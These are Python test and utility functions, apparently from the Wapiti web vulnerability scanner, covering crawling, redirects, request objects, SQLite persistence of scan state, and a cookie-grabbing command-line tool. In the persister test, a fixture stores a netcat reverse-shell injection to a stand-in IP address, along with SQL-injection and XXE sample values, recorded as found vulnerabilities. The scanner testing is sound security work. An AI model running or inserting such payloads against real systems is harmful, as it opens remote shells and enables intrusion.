def test_timeout(): url = "http://127.0.0.1:65080/timeout.php" crawler = Crawler(url, timeout=1) request = Request(url) with pytest.raises(ReadTimeout): crawler.send(request)
def test_persister_upload(): try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlitePersister("/tmp/crawl.db") persister.set_root_url("http://httpbin.org/") simple_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["file1", ["'fname1", "content"]], ["file2", ["fname2", "content"]]] ) xml_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["calendar", ["calendar.xml", "<xml>Hello there</xml"]]] ) persister.add_request(simple_upload) persister.add_request(xml_upload) assert persister.count_paths() == 2 stored_requests = set(persister.get_to_browse()) assert simple_upload in stored_requests assert xml_upload in stored_requests responses.add( responses.POST, "http://httpbin.org/post?qs1", body="Hello there" ) crawler = Crawler("http://httpbin.org/") for req in stored_requests: crawler.send(req) persister.add_request(req) if req == simple_upload: assert req.file_params == simple_upload.file_params assert req.file_params[0] == ["file1", ["'fname1", "content"]] assert req.file_params[1] == ["file2", ["fname2", "content"]] else: assert req.file_params == xml_upload.file_params assert req.file_params[0] == ["calendar", ["calendar.xml", "<xml>Hello there</xml"]] naughty_file = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["calendar", ["calendar.xml", "<xml>XXE there</xml>"]]] ) persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>") payload = next(persister.get_payloads()) assert naughty_file == payload.evil_request assert payload.parameter == "calendar" assert len(list(persister.get_forms(path="http://httpbin.org/post"))) == 2
def test_explorer_extract_links(): crawler = Crawler("http://perdu.com/") explorer = Explorer(crawler) responses.add(responses.GET, "http://perdu.com/", body="""<html><body> <a href="http://perdu.com/index.html"></a> <a href="https://perdu.com/secure_index.html"></a> <a href="//perdu.com/protocol_relative.html"></a> <a href="//lol.com/protocol_relative.html"></a> <a href="http://perdu.com:8000/other_port.html"></a> <a href="http://microsoft.com/other_domain.html"></a> <a href="welcome.html"></a> <a href="/about.html"></a> <form method="POST" action="http://perdu.com/valid_form.html"> <input name="field" type="hidden" value="hello"/></form> <form method="POST" action="http://external.com/external_form.html"> <input name="field" type="hidden" value="hello"/></form> """) request = Request("http://perdu.com/") page = crawler.send(request) results = list(explorer.extract_links(page, request)) # We should get 6 resources as the âth from the form will also be used as url assert len(results) == 6
def test_redirect(): slyfx = "http://www.slyfx.com/" disney = "http://www.disney.com/" responses.add(responses.GET, slyfx, body="Back to disneyland", status=301, headers={"Location": disney}) responses.add(responses.GET, disney, body="Hello there") crawler = Crawler(slyfx) page = crawler.send(Request(slyfx)) assert page.url == slyfx assert not page.history page = crawler.send(Request(slyfx), follow_redirects=True) assert page.url == disney assert page.history[0].url == slyfx
def getcookie_main(): parser = argparse.ArgumentParser( description= "Wapiti-getcookie: An utility to grab cookies from a webpage") parser.add_argument('-u', '--url', help='First page to fetch for cookies', required=True) parser.add_argument( '-c', '--cookie', help='Cookie file in Wapiti JSON format where cookies will be stored', required=True) parser.add_argument('-p', '--proxy', help='Address of the proxy server to use') parser.add_argument("--tor", action="store_true", help=_("Use Tor listener (127.0.0.1:9050)")) parser.add_argument("-a", "--auth-cred", dest="credentials", default=argparse.SUPPRESS, help=_("Set HTTP authentication credentials"), metavar="CREDENTIALS") parser.add_argument("--auth-type", default=argparse.SUPPRESS, help=_("Set the authentication type to use"), choices=["basic", "digest", "kerberos", "ntlm"]) parser.add_argument('-d', '--data', help='Data to send to the form with POST') parser.add_argument( "-A", "--user-agent", default=argparse.SUPPRESS, help=_("Set a custom user-agent to use for every requests"), metavar="AGENT", dest="user_agent") parser.add_argument( "-H", "--header", action="append", default=[], help=_("Set a custom header to use for every requests"), metavar="HEADER", dest="headers") args = parser.parse_args() parts = urlparse(args.url) if not parts.scheme or not parts.netloc or not parts.path: print( _("Invalid base URL was specified, please give a complete URL with protocol scheme" " and slash after the domain name.")) sys.exit() server = parts.netloc base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', '')) crawler = Crawler(base) if args.proxy: proxy_parts = urlparse(args.proxy) if proxy_parts.scheme and proxy_parts.netloc: if proxy_parts.scheme.lower() in ("http", "https", "socks"): crawler.set_proxy(args.proxy) if args.tor: crawler.set_proxy("socks://127.0.0.1:9050/") if "user_agent" in args: crawler.add_custom_header("user-agent", args.user_agent) if "credentials" in args: if "%" in args.credentials: crawler.credentials = args.credentials.split("%", 1) else: raise InvalidOptionValue("-a", args.credentials) if "auth_type" in args: crawler.auth_method = args.auth_type for custom_header in args.headers: if ":" in custom_header: hdr_name, hdr_value = custom_header.split(":", 1) crawler.add_custom_header(hdr_name.strip(), hdr_value.strip()) # Open or create the cookie file and delete previous cookies from this server json_cookie = jsoncookie.JsonCookie() json_cookie.open(args.cookie) json_cookie.delete(server) page = crawler.get(Request(args.url), follow_redirects=True) # A first crawl is sometimes necessary, so let's fetch the webpage json_cookie.addcookies(crawler.session_cookies) if not args.data: # Not data specified, try interactive mode by fetching forms forms = [] for i, form in enumerate(page.iter_forms(autofill=False)): if i == 0: print('') print( _("Choose the form you want to use or enter 'q' to leave :" )) print("{0}) {1}".format(i, form)) forms.append(form) valid_choice_done = False if forms: nchoice = -1 print('') while not valid_choice_done: choice = input(_("Enter a number : ")) if choice.isdigit(): nchoice = int(choice) if len(forms) > nchoice >= 0: valid_choice_done = True elif choice == 'q': break if valid_choice_done: form = forms[nchoice] print('') print(_("Please enter values for the following form: ")) print(_("url = {0}").format(form.url)) post_params = form.post_params for i, post_param_tuple in enumerate(post_params): field, value = post_param_tuple if value: new_value = input(field + " (" + value + ") : ") else: new_value = input("{}: ".format(field)) post_params[i] = [field, new_value] request = Request(form.url, post_params=post_params) crawler.send(request, follow_redirects=True) json_cookie.addcookies(crawler.session_cookies) else: request = Request(args.url, post_params=args.data) crawler.send(request, follow_redirects=True) json_cookie.addcookies(crawler.session_cookies) json_cookie.dump() json_cookie.close()
def getcookie_main(): parser = argparse.ArgumentParser(description="Wapiti-getcookie: An utility to grab cookies from a webpage") parser.add_argument( '-u', '--url', help='First page to fetch for cookies', required=True ) parser.add_argument( '-c', '--cookie', help='Cookie file in Wapiti JSON format where cookies will be stored', required=True ) parser.add_argument( '-p', '--proxy', help='Address of the proxy server to use' ) parser.add_argument( '-d', '--data', help='Data to send to the form with POST' ) args = parser.parse_args() parts = urlparse(args.url) if not parts.scheme or not parts.netloc or not parts.path: print(_("Invalid base URL was specified, please give a complete URL with protocol scheme" " and slash after the domain name.")) exit() server = parts.netloc base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', '')) crawler = Crawler(base) if args.proxy: proxy_parts = urlparse(args.proxy) if proxy_parts.scheme and proxy_parts.netloc: if proxy_parts.scheme.lower() in ("http", "https", "socks"): crawler.set_proxy(args.proxy) # Open or create the cookie file and delete previous cookies from this server jc = jsoncookie.JsonCookie() jc.open(args.cookie) jc.delete(server) page = crawler.get(Request(args.url), follow_redirects=True) # A first crawl is sometimes necessary, so let's fetch the webpage jc.addcookies(crawler.session_cookies) if not args.data: # Not data specified, try interactive mode by fetching forms forms = [] for i, form in enumerate(page.iter_forms(autofill=False)): if i == 0: print('') print(_("Choose the form you want to use or enter 'q' to leave :")) print("{0}) {1}".format(i, form)) forms.append(form) ok = False if forms: nchoice = -1 print('') while not ok: choice = input(_("Enter a number : ")) if choice.isdigit(): nchoice = int(choice) if len(forms) > nchoice >= 0: ok = True elif choice == 'q': break if ok: form = forms[nchoice] print('') print(_("Please enter values for the following form: ")) print(_("url = {0}").format(form.url)) post_params = form.post_params for i, kv in enumerate(post_params): field, value = kv if value: new_value = input(field + " (" + value + ") : ") else: new_value = input("{}: ".format(field)) post_params[i] = [field, new_value] request = Request(form.url, post_params=post_params) crawler.send(request, follow_redirects=True) jc.addcookies(crawler.session_cookies) else: request = Request(args.url, post_params=args.data) crawler.send(request, follow_redirects=True) jc.addcookies(crawler.session_cookies) jc.dump() jc.close()
def test_persister_basic(): url = "http://httpbin.org/?k=v" responses.add(responses.GET, url, body="Hello world!") crawler = Crawler("http://httpbin.org/") try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlitePersister("/tmp/crawl.db") persister.set_root_url("http://httpbin.org/") simple_get = Request("http://httpbin.org/?k=v") simple_post = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", "d"]]) persister.set_to_browse([simple_get, simple_post]) assert persister.get_root_url() == "http://httpbin.org/" assert persister.count_paths() == 2 assert not len(list(persister.get_links())) assert not len(list(persister.get_forms())) assert not len(list(persister.get_payloads())) stored_requests = set(persister.get_to_browse()) assert simple_get in stored_requests assert simple_post in stored_requests # If there is some requests stored then it means scan was started assert persister.has_scan_started() assert not persister.has_scan_finished() assert not persister.have_attacks_started() for req in stored_requests: if req == simple_get: crawler.send(req) persister.add_request(req) assert req.path_id == 1 assert persister.get_path_by_id(1) == req break # Should be one now as the link was crawled assert len(list(persister.get_links())) assert persister.count_paths() == 3 persister.set_attacked(1, "xss") assert persister.count_attacked("xss") == 1 assert persister.have_attacks_started() naughty_get = Request("http://httpbin.org/?k=1%20%OR%200") persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass") assert next(persister.get_payloads()) persister.flush_attacks() assert not persister.have_attacks_started() assert not len(list(persister.get_payloads())) persister.flush_session() assert not persister.count_paths() naughty_post = Request( "http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]) persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999") payload = next(persister.get_payloads()) assert naughty_post == payload.evil_request assert payload.parameter == "post2"
def test_request_object(): res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']]) res3 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'z']]) res4 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res5 = Request("http://httpbin.org/post?var1=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res6 = Request("http://httpbin.org/post?var3=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res7 = Request("http://httpbin.org/post?var1=z&var2=b&var4=e", post_params=[['post1', 'c'], ['post2', 'd']]) res8 = Request("http://httpbin.org/post?var2=d&var1=z", post_params=[['post1', 'c'], ['post2', 'd']]) res10 = Request("http://httpbin.org/post?qs0", post_params=[['post1', 'c'], ['post2', 'd']]) res11 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']]) res12 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ['fname1', 'content']], ['file2', ['fname2', 'content']]]) res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos") res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/") res15 = Request("https://duckduckgo.com/") res16 = Request("https://duckduckgo.com/", post_params=[['q', 'Kung Fury']]) res17 = Request("http://example.com:8080/dir/?x=3") res18 = Request("http://httpbin.org/get?a=1", get_params=[['get1', 'c'], ['get2', 'd']]) assert res1 < res2 assert res2 > res3 assert res1 < res3 assert res1 == res4 assert hash(res1) == hash(res4) res4.link_depth = 5 assert hash(res1) == hash(res4) assert res1 != res2 assert res2 >= res1 assert res1 <= res3 assert res13.file_name == "videos" assert res10.path == "http://httpbin.org/post" assert res10.file_name == "post" # This one is important as it could break attacks on query string assert res10.url == "http://httpbin.org/post?qs0" assert res13.parent_dir == res14.url assert res15.is_root assert res15.parent_dir == res15.url assert res13.dir_name == res14.url assert res14.dir_name == res14.url assert res15.dir_name == res15.url assert res15 != res16 query_list = [res15] assert res16 not in query_list assert res17.dir_name == "http://example.com:8080/dir/" assert res18.url == "http://httpbin.org/get?get1=c&get2=d" assert res17.hostname == "example.com:8080" assert res1.encoded_get_keys == res8.encoded_get_keys assert res17.encoded_get_keys == "x" assert res16.encoded_get_keys == "" assert len(res12) == 5 assert res12.encoded_get_keys == "qs1" assert res5.hash_params == res8.hash_params assert res7.hash_params != res8.hash_params print("Tests were successful, now launching representations") print("=== Basic representation follows ===") print(res1) print("=== cURL representation follows ===") print(res1.curl_repr) print("=== HTTP representation follows ===") print(res1.http_repr()) print("=== POST parameters as an array ===") print(res1.post_params) print("=== POST keys encoded as string ===") print(res1.encoded_post_keys) print("=== Upload HTTP representation ===") print(res12.http_repr()) print("=== Upload basic representation ===") print(res12) print("=== Upload cURL representation ===") print(res12.curl_repr) print("=== HTTP GET keys as a tuple ===") print(res1.get_keys) print("=== HTTP POST keys as a tuple ===") print(res1.post_keys) print("=== HTTP files keys as a tuple ===") print(res12.file_keys) print('') json_req = Request("http://httpbin.org/post?a=b", post_params=json.dumps({ "z": 1, "a": 2 }), enctype="application/json") crawler = Crawler("http://httpbin.org/") page = crawler.send(json_req) assert page.json["json"] == {"z": 1, "a": 2} assert page.json["headers"]["Content-Type"] == "application/json" assert page.json["form"] == {} page = crawler.send(res12) assert page.json["files"] res19 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ['fname1', 'content']], ['file2', ['fname2', 'content']]], enctype="multipart/form-data") page = crawler.send(res19) assert page.json["files"]